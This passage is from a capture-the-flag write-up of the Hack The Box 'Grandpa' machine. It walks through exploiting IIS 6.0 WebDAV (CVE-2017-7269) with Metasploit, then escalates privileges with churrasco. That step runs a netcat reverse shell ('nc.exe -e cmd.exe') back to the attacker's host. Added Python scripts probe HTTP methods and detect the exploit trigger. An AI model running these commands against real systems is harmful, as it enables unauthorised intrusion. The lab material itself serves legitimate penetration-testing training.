Unfortunately, I can’t find anything in /images (it doesn’t list directory contents), and /_private just returns a 403.
Nikto:
┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.14:80
+ /: Retrieved x-powered-by header: ASP.NET.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: WebDAV enabled (PROPPATCH UNLOCK LOCK PROPFIND MKCOL COPY SEARCH listed as allowed).
WebDAV:
This reminds me a lot of Granny, and given all the WebDAV in the nmap output, I ran davtest. Unlike in Granny, nothing is enabled:
┌──(kali💀kali)-[~]
└─$ davtest --url http://10.10.10.14/
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.14
********************************************************
NOTE Random string for this session: PNkA0RdNh4VDSDi
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT cfm FAIL
PUT pl FAIL
PUT jsp FAIL
PUT txt FAIL
PUT asp FAIL
PUT php FAIL
PUT jhtml FAIL
PUT html FAIL
PUT aspx FAIL
PUT shtml FAIL
PUT cgi FAIL
Note the difference between the two tools: nikto only reports what the Allow and Public headers advertise, while davtest actually tries the methods, and here MKCOL and every PUT fail. The WebDAV extension is loaded, but uploading a file the way Granny allowed is not an option on this box.
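The gap between what OPTIONS advertises and what the server actually allows is worth checking yourself rather than trusting either tool. The script below is an added example (not code from the original post, nor from nikto or davtest): it parses the Allow/Public headers the way nikto does, then, only if PUT is advertised, writes a uniquely named text file and deletes it again. The default target host and the probe file name are assumptions made for this example.

```python
"""Probe which HTTP methods a server advertises versus which ones actually work.
Added example, not code from the original post or from nikto/davtest. The default
target host and the probe file name are assumptions (constructed for this example)."""
import http.client
import secrets
import sys

# Methods nikto warns about: anything that can create, move or delete content.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
# RFC 4918 methods (plus SEARCH): if any appear, the WebDAV extension is enabled.
DAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}


def parse_methods(header_value):
    """Turn 'OPTIONS, TRACE, GET , HEAD' into an upper-cased set of method tokens,
    ignoring empty entries and stray punctuation (nikto prints a trailing ' .')."""
    if not header_value:
        return set()
    tokens = (tok.strip().upper() for tok in header_value.split(","))
    return {tok for tok in tokens if tok and tok.replace("-", "").isalnum()}


def classify(allow, public=None):
    """Summarise what the Allow and Public headers advertise, the way nikto does."""
    methods = parse_methods(allow) | parse_methods(public)
    return {
        "methods": methods,
        "webdav": bool(methods & DAV_METHODS),
        "writable": sorted(methods & WRITE_METHODS),
    }


def probe(host, port=80, path="/"):
    """OPTIONS the path, then (only if PUT is advertised) try to write a small,
    uniquely named text file and delete it again. Returns
    (summary, put_status, delete_status); a status is None when not attempted."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    resp.read()
    summary = classify(resp.getheader("Allow"), resp.getheader("Public"))
    put_status = delete_status = None
    if "PUT" in summary["methods"]:
        # Random name so the probe cannot clobber an existing file (davtest does the same).
        target = path.rstrip("/") + "/davprobe_" + secrets.token_hex(6) + ".txt"
        conn.request("PUT", target, body=b"davprobe\n",
                     headers={"Content-Type": "text/plain"})
        resp = conn.getresponse()
        resp.read()
        put_status = resp.status
        if 200 <= put_status < 300:
            conn.request("DELETE", target)
            resp = conn.getresponse()
            resp.read()
            delete_status = resp.status
    conn.close()
    return summary, put_status, delete_status


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.14"
    summary, put_status, delete_status = probe(host)
    print("advertised:", ", ".join(sorted(summary["methods"])))
    print("webdav:", summary["webdav"], " writable methods:", summary["writable"])
    print("PUT status:", put_status, " DELETE status:", delete_status)
```

Against Grandpa the summary will list every method nikto reported, and the PUT status is what decides whether a Granny-style upload is possible. Anything other than a 2xx there means the Allow header is advertising more than IIS is configured to permit.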
Vulnerabilities:
Since IIS 6.0 is so old, I decided to look for vulnerabilities, and found some:
┌──(kali💀kali)-[~]
└─$ searchsploit iis 6.0
Exploit Title | Path
------------------------------------------------------------ ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Ne | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote St | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Servic | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (De | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Bu | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Pa | windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
The interesting entry is 41738.py: Microsoft IIS 6.0 is vulnerable to a remote buffer overflow in the WebDAV ScStoragePathFromUrl function (CVE-2017-7269), triggered by an over-long If: header in a PROPFIND request.
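From the defensive side, the trigger described above is easy to spot in raw HTTP traffic: a PROPFIND carrying an If: header that is far longer than any lock token or ETag, usually full of non-ASCII bytes. The script below is an added example, not code from the original post or from any advisory: it parses raw requests and flags that pattern. The sample requests are constructed, and the 512-byte threshold is an assumption chosen for this example.

```python
"""Flag PROPFIND requests whose If: header looks like a CVE-2017-7269 trigger.
Added example, not from the original post. The request samples are constructed,
and MAX_IF_LEN is an assumed threshold, not a value from any advisory."""

# Assumption: genuine If: headers carry lock tokens or ETags and stay short; the
# ScStoragePathFromUrl overflow needs a header far longer than this.
MAX_IF_LEN = 512


def parse_request(raw):
    """Parse the head of a raw HTTP request held as bytes.
    Returns (method, target, headers) with header names lower-cased; only the
    first occurrence of a header is kept and the body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        raise ValueError("malformed request line")
    method = parts[0].decode("ascii", "replace").upper()
    target = parts[1].decode("ascii", "replace")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers.setdefault(name.strip().lower().decode("ascii", "replace"), value.strip())
    return method, target, headers


def classify_request(raw):
    """Return {'method', 'target', 'suspicious', 'reasons'} for one request.
    Only PROPFIND with an If: header is considered, matching the CVE description."""
    method, target, headers = parse_request(raw)
    reasons = []
    value = headers.get("if")
    if method == "PROPFIND" and value is not None:
        if len(value) > MAX_IF_LEN:
            reasons.append(f"If header is {len(value)} bytes, over {MAX_IF_LEN}")
        if any(b > 0x7F for b in value):
            reasons.append("If header contains non-ASCII bytes")
    return {"method": method, "target": target,
            "suspicious": bool(reasons), "reasons": reasons}


def scan(requests):
    """Run classify_request over a list of raw requests; return (index, reasons) per hit."""
    hits = []
    for i, raw in enumerate(requests):
        result = classify_request(raw)
        if result["suspicious"]:
            hits.append((i, result["reasons"]))
    return hits


# Constructed samples (not captured traffic).
BENIGN_PROPFIND = (b"PROPFIND /images/ HTTP/1.1\r\nHost: 10.10.10.14\r\n"
                   b"Depth: 1\r\nContent-Length: 0\r\n\r\n")
BENIGN_MOVE = (b"MOVE /docs/a.txt HTTP/1.1\r\nHost: 10.10.10.14\r\n"
               b"Destination: http://10.10.10.14/docs/b.txt\r\n"
               b"If: (<opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>)\r\n\r\n")
ATTACK_PROPFIND = (b"PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\nContent-Length: 0\r\n"
                   b"If: <http://10.10.10.14/" + b"\xc3\xa4" * 400 + b">\r\n\r\n")
SAMPLES = [BENIGN_PROPFIND, BENIGN_MOVE, ATTACK_PROPFIND]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLES):
        print(f"request {index}: {'; '.join(reasons)}")
```

The check is deliberately narrow (PROPFIND plus If:) so that ordinary WebDAV clients sending lock tokens on MOVE or PUT do not trip it; if you run it on a real capture, tune MAX_IF_LEN to the longest If: header your legitimate clients produce.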
Note: Several people I know have tried to solve this box without using Metasploit and have failed to because the shell you get back is too unstable. Therefore, I’ll be solving this box using Metasploit.
Foothold: Metasploit
Start up Metasploit.
┌──(kali💀kali)-[~]
└─$ msfconsole
Viewing the exploit on Exploit-DB, it is tracked as CVE-2017-7269. Let’s see if Metasploit has a module for it.
msf6 > search 2017-7269
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
It does. Switch to that module, set RHOSTS to Grandpa’s IP address and LHOST to the attacking interface, and run it:
msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.2
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
The shell we get back, however, is a bit unstable. Running ps in Meterpreter lists the running processes:
meterpreter > ps
2736 1496 w3wp.exe x86 0 NT AUTHORITY\NETWORK SER c:\windows\system32\inet
Process 2736 is the interesting one: it is w3wp.exe, the IIS worker process, running as NT AUTHORITY\NETWORK SERVICE. We can migrate into it using the migrate command:
meterpreter > migrate 2736
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
Cool. Now we’ll need to focus on escalating our privileges to get the flags. First, a quick look at the user profiles:
meterpreter > cd 'C:\Documents and Settings'
meterpreter > cd 'C:\Documents and Settings\Harry'
Let’s background this session and use the local_exploit_suggester module to check for privilege escalation vectors:
meterpreter > background
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search local_exploit_suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
Nice, the module found quite a few candidates.
I’m most interested in trying exploit/windows/local/ms14_070_tcpip_ioctl.
I can search for and use that module, then set the session and my LHOST IP address:
msf6 post(multi/recon/local_exploit_suggester) > search exploit/windows/local/ms14_070_tcpip_ioctl
msf6 post(multi/recon/local_exploit_suggester) > use 0
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST 10.10.14.2
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions -i 1
This exploit too would sometimes fail if the box wasn’t freshly started. When running memory-corruption exploits, it’s a good idea to start from a clean state if possible (i.e. reset the box).
Interestingly, I didn’t have access to user.txt at this point. There was one user, Harry, and I couldn’t enter that profile:
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
C:\>cd Documents and Settings
C:\Documents and Settings>dir
C:\Documents and Settings>cd Harry
cd Harry
Access is denied.
Privilege Escalation
To run any exploits, I’ll need a place I can write on Grandpa. Many of my go-tos failed. In the system root, there’s an unusual directory, wmpub:
C:\>cd wmpub
C:\wmpub>echo test > test.txt
C:\wmpub>dir
C:\wmpub>type test.txt
type test.txt
test
icacls shows that as well:
C:\>icacls wmpub
The Users entry carries WD, which decodes to write data / add files.
systeminfo:
While you don’t see it in newer HTB boxes, for these original hosts kernel exploits were often the intended path, and it’s definitely something that will come up in OSCP. To check, I’ll start with systeminfo:
C:\wmpub>systeminfo
Host Name: GRANPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 2 Hours, 4 Minutes, 47 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2293 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 751 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,288 MB
Page File: In Use: 182 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
I can then drop that into a file and use Windows Exploit Suggester to see what exploits might work.
First, update the tool’s local copy of the Microsoft security bulletin database:
┌──(kali💀kali)-[/opt]
└─$ cd Windows-Exploit-Suggester
┌──(kali💀kali)-[/opt/Windows-Exploit-Suggester]
└─$ sudo ./windows-exploit-suggester.py --update
Now pass it the new database (--database) and the saved systeminfo output (--systeminfo):
Going from this list to a shell is often a lot of googling, guessing, and trial and error. I’ll reduce the list with the following criteria:
Not interested in Metasploit.
Looking (at least to start) for exploits against Windows itself, not IE or MsSQL.
I like to start with ones that I can find a pre-compiled exe. That’s not a great idea for real work, but easiest for HTB / OSCP.
The exe has to create a new process that calls back, or return a shell in the same window. Many of these have exes that pop a new SYSTEM shell in a separate window, which isn’t useful at all over a reverse shell.
No Success
I tried a lot from this list, but none with success. This is normal for this kind of thing: frustrating, but normal. One tip I’d throw out for anyone doing OSCP: keep a list of exploits that have binaries fitting the descriptions above and where they work. I used to have one, but can’t find it anymore. Something like this is a really good start.
I went back to enumerating, and checked privs:
C:\>whoami /priv
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeImpersonatePrivilege is one I know to look out for. On modern boxes, that means a potato exploit (juicy, lonely, rotten). On Server 2003, it’s better to start with churrasco, the original token-kidnapping exploit.
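Picking SeImpersonatePrivilege out of that list by eye works on six rows, but it is worth having a routine that does it for you and says why each privilege matters. The script below is an added example, not code from the original post: it parses whoami /priv output and returns the privileges that commonly lead to escalation. The SAMPLE text is the whoami /priv output shown above, and the explanations in HIGH_VALUE are my summary, not anything from the page.

```python
"""Triage the output of `whoami /priv` for privileges that commonly turn into
local privilege escalation. Added example, not from the original post; SAMPLE is
copied from the whoami /priv output shown on the page."""
import re

# Privilege -> why an attacker cares about it (author's summary, not from the page).
HIGH_VALUE = {
    "SeImpersonatePrivilege": "token impersonation: churrasco on Server 2003, potato family on newer Windows",
    "SeAssignPrimaryTokenPrivilege": "same token-abuse family as SeImpersonatePrivilege",
    "SeDebugPrivilege": "open any process, including SYSTEM ones, and inject into it",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM and SYSTEM hives)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of an object, then rewrite its ACL",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the operating system",
}

# One row: name, free-text description (may contain spaces), then Enabled/Disabled.
ROW_RE = re.compile(r"^(Se\w+)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return a list of {'name', 'description', 'enabled'} for each privilege row,
    skipping the header and separator lines."""
    rows = []
    for line in text.splitlines():
        match = ROW_RE.match(line.strip())
        if match:
            rows.append({"name": match.group(1),
                         "description": match.group(2),
                         "enabled": match.group(3) == "Enabled"})
    return rows


def triage(text):
    """Return the high-value privileges present in the output, in the order listed.
    'Disabled' means the privilege is held but not currently enabled in the token;
    the process can enable it itself, so it still counts."""
    return [dict(row, why=HIGH_VALUE[row["name"]])
            for row in parse_whoami_priv(text) if row["name"] in HIGH_VALUE]


SAMPLE = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        state = "enabled" if row["enabled"] else "held but disabled"
        print(f"{row['name']} ({state}): {row['why']}")
```

On Grandpa this reports two hits: SeAssignPrimaryTokenPrivilege (held but disabled) and SeImpersonatePrivilege (enabled), which is exactly the pair the token-kidnapping exploits rely on.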
churrasco:
I grabbed the binary from the Churrasco GitHub and ran smbserver.py share . on my local machine to open an SMB share named share containing both nc.exe and churrasco.exe:
┌──(kali💀kali)-[~/Desktop]
└─$ smbserver.py share .
C:\wmpub>copy \\10.10.14.2\share\nc.exe .
C:\wmpub>copy \\10.10.14.2\share\churrasco.exe
Now run it, having it run nc to connect back to me:
┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
C:\wmpub>.\churrasco.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.2 443"
┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.14] 1045
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system